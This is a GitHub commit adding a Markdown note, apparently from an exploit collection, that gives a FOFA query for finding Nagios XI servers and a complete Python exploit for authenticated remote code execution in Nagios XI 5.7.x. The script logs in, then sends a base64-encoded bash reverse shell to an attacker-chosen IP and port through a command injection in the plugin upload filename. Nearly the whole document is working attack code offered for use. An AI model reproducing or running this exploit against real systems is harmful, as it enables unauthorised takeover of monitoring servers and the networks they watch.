Add files via upload

ba1ma0 · Jan 15, 2021 · e1c23a9 · e1c23a9
1 parent 4cbfec9
commit e1c23a9
Showing 1 changed file with 106 additions and 0 deletions.
diff --git a/Nagios XI 5.7.X 远程代码执行.md b/Nagios XI 5.7.X 远程代码执行.md
@@ -0,0 +1,106 @@
+# Nagios XI 5.7.X 远程代码执行
+
+fofa：
+
+```
+app="Nagios-XI"
+```
+
+
+```py
+# Exploit Title: Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated)
+# Date: 19/12/2020
+# Exploit Author: Haboob Team (https://haboob.sa)
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Version: Nagios XI 5.7.x
+# Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM
+
+#!/usr/bin/python3
+
+# pip3 install bs4 lxml
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+import base64
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 
+
+if len(sys.argv) != 6:
+    print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port")
+    print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443")
+    exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+request = requests.session()
+
+
+def login():
+    # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks)
+    nsp_str_req = request.get(url+"/nagiosxi/login.php", verify=False)
+    content = nsp_str_req.text
+    soup = BeautifulSoup(content, "lxml")
+    nsp_str = soup.find_all('input')[0].get('value')
+    print("[+] Extract login nsp token : %s" % nsp_str)
+
+    # Login
+    login_info = {
+    "nsp": nsp_str,
+    "pageopt": "login",
+    "username": username,
+    "password": password
+    }
+    login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False)
+    login_text = login_request.text
+
+    # Check Login Status
+    if "Core Config Manager" in login_text:
+        return True
+    else:
+        print("[-] Login ... Failed!")
+        return False
+
+
+
+def execute_payload():
+    # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks)
+    print("[+] Request upload form ...")
+    nsp_str_req = request.get(url+"/nagiosxi/admin/monitoringplugins.php", verify=False)
+    content = nsp_str_req.text
+    soup = BeautifulSoup(content, "lxml")
+    nsp_str = soup.find_all('input')[1].get('value')
+    print("[+] Extract upload nsp token : %s" % nsp_str)  
+
+    # Payload Base64 Encoding
+    payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port)
+    payload_bytes = payload_decoded.encode('ascii')
+    base64_bytes = base64.b64encode(payload_bytes)
+    payload_encoded = base64_bytes.decode('ascii')
+    payload = ";echo " + payload_encoded + " | base64 -d | bash;#"
+    print("[+] Base64 encoded payload : %s" % payload)
+
+    # Payload Execution
+    multipart_form_data = {
+    'upload': (None, '', None),
+    'nsp': (None, nsp_str, None),
+    'uploadedfile': (payload, 'whatever', 'text/plain'),
+    'convert_to_unix': (None, '1', None),
+    }
+    print("[+] Sending payload ...")
+    print("[+] Check your nc ...")
+    rce = request.post(url +"/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False)
+
+
+
+if login():
+    print("[+] Login ... Success!")
+    execute_payload()
+
+```
+
+from：https://www.exploit-db.com/exploits/49422